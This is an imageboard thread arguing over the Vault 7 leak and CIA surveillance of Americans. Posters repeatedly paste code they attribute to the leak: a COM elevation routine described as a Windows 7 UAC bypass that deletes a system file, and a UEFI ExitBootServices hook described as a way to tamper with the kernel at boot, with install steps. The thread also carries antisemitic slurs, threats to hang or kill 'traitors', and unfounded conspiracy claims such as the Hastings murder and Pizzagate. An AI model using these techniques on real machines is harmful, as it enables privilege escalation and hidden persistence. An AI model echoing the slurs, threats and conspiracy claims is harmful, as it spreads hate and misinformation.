What's your opinion on vault 7, CIA spying on Americans etc.?

what's your opinion on vault 7, CIA spying on Americans etc.?

Other urls found in this thread:

wikileaks.org/ciav7p1/cms/page_3375231.html
theweek.com/articles/463146/dni-nsa-cant-spy-americans-without-warrant
quora.com/What-are-the-rules-on-the-CIA-operating-within-the-borders-of-the-United-States
youtube.com/watch?v=ZodXLiGLsAU
twitter.com/NSFWRedditVideo

Literally fake news being put out by the drumpf admins to cover up their Russia ties.

I'm iffy on it.

>wikileaks.org/ciav7p1/cms/page_3375231.html

Execute any function with administrative privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative privileges


[code]

HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[50];
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);
}

void ElevatedDelete()
{
MessageBox(NULL, "DELETING", "TESTING", MB_OK);

// This is only availabe on Vista and higher
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
pfo->SetOperationFlags(FOF_NO_UI);
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);
pfo->PerformOperations();
item->Release();
pfo->Release();
CoUninitialize();
}

[/code]

Theyre the bees knees for script kiddies, op

wikileaks.org/ciav7p1/cms/page_36896783.html

Hack the OS's kernel while in memory at the end the of UEFI boot process, immediatly before control is handed over to kernel


[code]
extern EFI_BOOT_SERVICES *gBS;
EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;
EFI_STATUS
EFIAPI
ExitBootServicesHook(IN EFI_HANDLE ImageHandle, IN UINTN MapKey){

/* */
/* Do fun hook-related stuff here */
/* */

/* Fix the pointer in the boot services table */
/* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */
gBS->ExitBootServices = gOrigExitBootServices;

/* Get the memory map */
UINTN MemoryMapSize;
EFI_MEMORY_DESCRIPTOR *MemoryMap;
UINTN LocalMapKey;
UINTN DescriptorSize;
UINT32 DescriptorVersion;
MemoryMap = NULL;
MemoryMapSize = 0;


do {
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
if (Status == EFI_BUFFER_TOO_SMALL){
MemoryMap = AllocatePool(MemoryMapSize + 1);
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
} else {
/* Status is likely success - let the while() statement check success */
}
DbgPrint(L"This time through the memory map loop, status = %r\n",Status);

} while (Status != EFI_SUCCESS);

return gOrigExitBootServices(ImageHandle,LocalMapKey);

}
EFI_STATUS
EFIAPI
HookDriverMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable){

/* Store off the original pointer and replace it with your own */
gOrigExitBootServices = gBS->ExitBootServices;
gBS->ExitBootServices = ExitBootServicesHook;

/* It's hooked! Return EFI_SUCCESS so your driver stays in memory */
return EFI_SUCCESS;
}
[/code]

BBBB....U...U.....MMMMM.....PPPP
B.....B....U...U.....M...M...M.....P.....P
BBBB.....U...U.....M...M...M.....PPPP
B.....B.....U...U.....M...M...M.....P
BBBB.......UUU.....M...M...M.....P

>BBBB....U...U.....MMMMM.....PPPP
>B.....B....U...U.....M...M...M.....P.....P
>BBBB.....U...U.....M...M...M.....PPPP
>B.....B.....U...U.....M...M...M.....P
>BBBB.......UUU.....M...M...M.....P

anyone with any tech knowledge knew all this already, sadly the fake news media will not cover this or show the outrage needed to wake up the normies.

i still think all these leaks the last several years is coming from the cia/nsa as a way to normalize the spying in peoples minds, drip drip drip and then people dont even notice.

I say they murdered Michael Hastings but thats not really a big suprise.

But obama promised in like 2010 that any additional security vulnerabilities they would report to be patched...

Or are you implying Obama lied?

His name was Michael Hastings

the facts imply it

What, did I spell something wrong?

Just delte the system 32 folder. Idiot.

This is a non-story we already knew, that was put out to slide the revelation that Trump has a FISA warrant against him for being a traitor with Russia, and his campaign staff have connections to the Kremlin and Wikileaks.

fake news.

Obama and dems are scared shitless over their overreaching surveillance and murder of Michael Hastings

CIA go home.

I'm ready to revert back to flip-phones and CRT TVs because the bad guys are going to get a hold of these exploits (if they haven't already)

Proof please

>wikileaks.org/ciav7p1/cms/page_3375231.html

Execute any function with administrative privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative privileges


[code]

HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[50];
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);
}

void ElevatedDelete()
{
MessageBox(NULL, "DELETING", "TESTING", MB_OK);

// This is only availabe on Vista and higher
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
pfo->SetOperationFlags(FOF_NO_UI);
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);
pfo->PerformOperations();
item->Release();
pfo->Release();
CoUninitialize();
}

[/code]

Nice 45.ACP gets my freund.

>Obama and dems are scared shitless over their overreaching surveillance and murder of Michael Hastings

1. No one is scared except Trump.

2. Hastings wasn't murdered.

3. You can't surveil an American citizen without a FISA warrant, and CIA only surveils foreign nationals, anyway. Talk to a foreign national and be sketchy, yep you might get looked at. Only criminals have a problem with this.

>CIA is listening to people via their televisions
>CIA can take control of self-driving cars
>CIA can hack into your phone

Yup, nothing

>1. No one is scared except Trump.
I'm scared shitless over this

>2. Hastings wasn't murdered.
Yeah, right.

>3. You can't surveil an American citizen without a FISA warrant, and CIA only surveils foreign nationals, anyway. Talk to a foreign national and be sketchy, yep you might get looked at. Only criminals have a problem with this.
The CIA has a long history of following laws and American legal procedures.

Either way its not suprising that the Scumfucks at the CIA are doing this kinda shit, Someones gotta put a leash on those motherfuckers especially the director.

if you got nothing to hide then you done nothing wrong

whats the problem here?

surely you realise the CIA, the literal spy agency, actually engages in spying

what does it even mean to be an "american citizen" and why should that magically exempt you from inspection.

wow you got a piece of paper with a certain configuration of letters on it? oh boy i guess that means you are 100% trust worthy and dont need to be monitored, good day.

stupid fats we need these agencies to keep us safe

canada has an agency too

>what's your opinion on vault 7, CIA spying on Americans etc.?

You would already know, CIA.

Fuck off traitors, shills get the noose too

I second this.

...

Controlled leak as everything else.

>MFW
>CIA Meta mining.

I swear you're the same leaf cunt from every thread this morning. Maple shills

...

>
I agree that Obama broke his promise, if that's what ur implying/

>Proof please

theweek.com/articles/463146/dni-nsa-cant-spy-americans-without-warrant

quora.com/What-are-the-rules-on-the-CIA-operating-within-the-borders-of-the-United-States

Hastings indicated that he believed he was being investigated by the Federal Bureau of Investigation. Later FOIA releases proved this was true. No one would murder him under FBI watch.

is this the same CIA that was selling drugs in the inner cities? cause we should trust them and what they say if is.

Lol shills out in force, here's a tortoise pic tell your boys to make maymay for me

FISA court has no problems with issuing a warrant under homeland security reasons if you simply ask for it. They're a bit more stringent if you pursue one under a criminal charge (which they tried already with trump and was actually rejected back in june). It means nothing.

edpilling isn't to be contained to Sup Forums; spread the word among your peers.

It's easy to get overwhelmed with how massive the system we're fighting is os I broke it into 3 tiers.

>Tier 3: Plebs
Those who pretty much don't care one way or another. That's fine they're just people. Plebs but you can't blame them; they've got lives to live.

>Tier 2: Faux Woke Heroes
There are those who seek the Truth but are too indoctrinated to get out of the bubble. This is bad. These are the ons who convince normies to go along with the injustice. These are the twitter "woke" and pseudo-intellectuals who are amazing at regurgitating what others want them to say. They unintentionally, be it for good moral reasons or not, propagate a system of oppression against their countrymen.

>Tier 3: Powerful institutions
Then you have those who know the truth and are actively seeking to undermine it, i.e. Jews, Soros, shills, MSM, 3 letter agencies and the like. These are the top tier. They create the faux woke heroes and actively seek to destroy freedoms of the masses for their gain.

The best we can do is work on Tier 3 and 2.

Tier 3 we get by showing them how fucked up everything is. Elicit an emotional response and snap them out of their haze. Tier 2 you need to hit with logical arguments with more advanced persuasion techniques. You work on these ones slowly to realign their world view.

We don't have the manpower to affect tier 1 in any reasonable way right now. The best way to arm ourselves against those are to be aware of how they act and share that with others.

...

< See this girl, look how safe she is.

Lets trust the same people with "1984".

Just more proof that the CIA loves us and wants to make sure we're safe. CIA, I'm not a big guy, don't mind me.

>I'm scared shitless over this

Then you're stupid. There is no expectation of privacy with ANY electronic communications whatsoever, most of us have known this since the Patriot Act was passed, and the general public has known this since Snowden.

The only reason you should be scared is if you are an international terrorist or a spy.

you realize that people with smart baby monitors often don't change the default password, etc. so you can watch your kids sleep or you can wake up the kids by playing smashmouth through it

youtube.com/watch?v=ZodXLiGLsAU

these are the people who vote, these are the people who have kids. they dont care about hacking or the CIA or anything like that, as long as police keep niggers out of the suburbs and little johnny gets to soccer practice on time

technically it wasn't a "murder"
plausible deniability all over it...doesnt mean it wasnt the CIA...if they can make the phishing scheme podesta fell into as russian hacking...im sure they can make the hastings incident an apparent suicide

>Someones gotta put a leash on those motherfuckers especially the director.

That would be dangerous for the National Security , and Washington will not allow a CiC compromised by Russia to put out the eyes and ears of America.

If you think they will, just try.

>No one would murder him under FBI watch
Yeah, the FBI would be so mad that the Deep State killed him

That's like saying "The Sheriff will keep the lynch mob out"

...

This is what I hate about Centralized governments so easily Corrupted.

. No one is scared except Trump.
>I'm scared shitless over this

Then you're very naive and poorly informed.
. Hastings wasn't murdered.
>Yeah, right.

Prove it. The burden of proof lies upon the one making the claim, which is you.

. You can't surveil an American citizen without a FISA warrant, and CIA only surveils foreign nationals, anyway. Talk to a foreign national and be sketchy, yep you might get looked at. Only criminals have a problem with this.
>The CIA has a long history of following laws and American legal procedures.

So do you. Does that mean you killed Michael Hastings, and I can assume you will commit more crimes in the future, so you're guilty for whatever I feel you are that fits my narrative?

Ok.

honestly, same. i was very suspicious, but i never had any hard evid.

LMAOOOOO

those types of ppl make me want to kms.

>FISA court has no problems with issuing a warrant under homeland security reasons if you simply ask for it. They're a bit more stringent if you pursue one under a criminal charge (which they tried already with trump and was actually rejected back in june). It means nothing.

FISA court issued about 300 warrants last year out of a population of hundreds of millions of citizens.


There is no mass surveillance of U.S. Citizens, and any evidence obtained without a warrant is inadmissible. That's why we know there was a warrant for Trump Tower.

this makes perfect sense, because if they WERE mass surveilling us all, they would tell us.

makes pefect sense, user, my eyes are now opened

>< See this girl, look how safe she is.
>Lets trust the same people with "1984".

You don't even know who this girl is. She looks like she's in a full body cast.

Wow. This is huge.

>..doesnt mean it wasnt the CIA..

doesn't mean it wasn't Putin for that matter.

you don't know who it was, if it was anyone at all.

Thanks for the (You), user.

Heres another:

wikileaks.org/ciav7p1/cms/page_36896783.html

Hack the OS's kernel while in memory at the end the of UEFI boot process, immediatly before control is handed over to kernel

requires compiling as a UEFI executable and inserting into the linux /boot/UEFI directory, or onto the Windows UEFI boot partition

[code]
extern EFI_BOOT_SERVICES *gBS;
EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;
EFI_STATUS
EFIAPI
ExitBootServicesHook(IN EFI_HANDLE ImageHandle, IN UINTN MapKey){

/* */
/* Do fun hook-related stuff here */
/* */

/* Fix the pointer in the boot services table */
/* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */
gBS->ExitBootServices = gOrigExitBootServices;

/* Get the memory map */
UINTN MemoryMapSize;
EFI_MEMORY_DESCRIPTOR *MemoryMap;
UINTN LocalMapKey;
UINTN DescriptorSize;
UINT32 DescriptorVersion;
MemoryMap = NULL;
MemoryMapSize = 0;


do {
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
if (Status == EFI_BUFFER_TOO_SMALL){
MemoryMap = AllocatePool(MemoryMapSize + 1);
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
} else {
/* Status is likely success - let the while() statement check success */
}
DbgPrint(L"This time through the memory map loop, status = %r\n",Status);

} while (Status != EFI_SUCCESS);

return gOrigExitBootServices(ImageHandle,LocalMapKey);

}
EFI_STATUS
EFIAPI
HookDriverMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable){

/* Store off the original pointer and replace it with your own */
gOrigExitBootServices = gBS->ExitBootServices;
gBS->ExitBootServices = ExitBootServicesHook;

/* It's hooked! Return EFI_SUCCESS so your driver stays in memory */
return EFI_SUCCESS;
}
[/code]

>>No one would murder him under FBI watch
>Yeah, the FBI would be so mad that the Deep State killed him
>That's like saying "The Sheriff will keep the lynch mob out"

The FBI would not allow anyone to murder an American citizen on their watch.

Guess this won't work if SecureBoot is enable,d though.
Right?

>The FBI would not allow anyone to murder an American citizen on their watch.
Michael Hastings

maple seeds don't look like that

Obongo is a pillar of truth.

>this makes perfect sense, because if they WERE mass surveilling us all, they would tell us.
>makes pefect sense, user, my eyes are now opened

1. Too many people.

2. Too much data.

3. Not enough compute cycles.

4. Not enough storage.

5. Not enough manpower.

6. It's illegal.

The CIA is narrowly focused on threats to national security originating in their jurisdiction, i.e. outside of the mainland United States.

it still works with secure boot enabled
secure boot only cares what OS your booting into.

It would likely NOT work using a TPM module which verifies the UEFI integrity upon boot. SecureBoot does not do this.

What is "The Utah Data Center"
Final answer.

>because if they WERE mass surveilling us all, they would tell us.

Investigations cost money, user. They aren't gonna investigate anyone who isn't a player or a heavy hitter.

I've HAD THE DOCUMENTS, YOU JUST WOULDNT BY MY FLUORIDE FILTERS

>
YEAH< BC LEGALITY HAS STOPPE THE FUCKING GOVT. BEFORE. Do you even remember the sedition act? these people DO NOT CARE

You left out innocent people that they want to destroy for financial or political reasons.

>>The FBI would not allow anyone to murder an American citizen on their watch.
>Michael Hastings

Circular argument.

Prove it.

You can't because it wasn't a murder..

Can you not, anyone who is worth there salt wouldnt be coding/hacking/niggering on Sup Forums so you're a script kiddy who is spamming nonsense

They simply collect everything and then reference at a later date if they need to.

Storage is cheap. probably ~$50 pr terabyte when buying in bulk

Ya I'm sure they would really get on that, fuck off faggot. You CIA traitors are going to the noose shortly.

>What is "The Utah Data Center"
>Final answer.

Not even close to enough space to cover ongoing surveillance of the entire nation.

tell the CIA its nonsense, user.

Their code, not mine

Hello, CIA Shills
hows it going over at """The Branch"""?

>You left out innocent people that they want to destroy for financial or political reasons.

name one.

Eh, it's sketchy and all that, but really I don't mind it personally unless we start getting evidence of them abusing it.

Like, if they want to watch me jerk it to some futanari tentacle porn, that's fine.
Get back to me when they start vanning people for non-illegal shit picked up through this.

I want to know why the CIA did not report this leak. They knew before Obama left office. That means they didnt tell 2 Presidents. I'd like to know who gets fired for that. I'd like to know if they are using these capabilities on US citizens. If they can prove they are not then these leaks are very damaging. If its true then we know our own system is the threat to us and we can reform it. Im sure i can think of other actually meaningful questions but I am high. You understand.

>They simply collect everything and then reference at a later date if they need to.

prove it.

Us common people have no clue about their storage capabilities. If they are 20 years ahead in tech, they can easily store everything. Imagine 20 years ago, the common person owning a terabyte drive.

A significant faction of the CIA is out of fucking control and needs to be purged.

>I want to know why the CIA did not report this leak.

Probably weren't aware of it.

...

The most shoking thing about vault 7 is that the ones attacking assange are the SJW, MSM and democrats
White house sems to give a shit about it.
This time line is so fucked up

>A significant faction of the CIA is out of fucking control and needs to be purged.

If you think "purging them" makes them less dangerous, I invite you to have at it. You've obviously learned nothing from history.

...

Only they lost control of the hacking data, you dumb leaf. That means anyone can use this stuff. How fucking stupid are you?

Micheal Hasting, Donald Trump, Gary Webb

>This time line is so fucked up

It is fucking insane how quickly society can just totally change. It makes you really wonder what can happen in the next 10, 20 or 50 years.

Fuck off nigger FAGGOT. Shill it up on leddit until we come and kill your globalist traitor ass. Kike.

Pretty sure you use a standard warrant for a US citizen. It goes through FISA if they are foreign intelligence or suspected. Hence Foreign Intelligence Surveillance Act

top kek this is the narrative, isn´t it? Make normies not look into it. Well, that´s where we come in, isn´t it, Shareblue cuck.

Then teach us you faggot. I say we slaughter every single one of you traitors and hang your bodies from Langley.

Nobody forgot Pizzagate / Pedogate. This time, it´s different. This time, we´ve got Kek on our side (for now at least)

We'll kill you too kike traitor.

I can't prove this instance. But this is like when someone with a heroin problem has spent 45 minutes in the bathroom.

Strong argument all, very strong. Wait, something is happening. Huh, wtf is going on inside me?

WTF I´M WITH HER NOW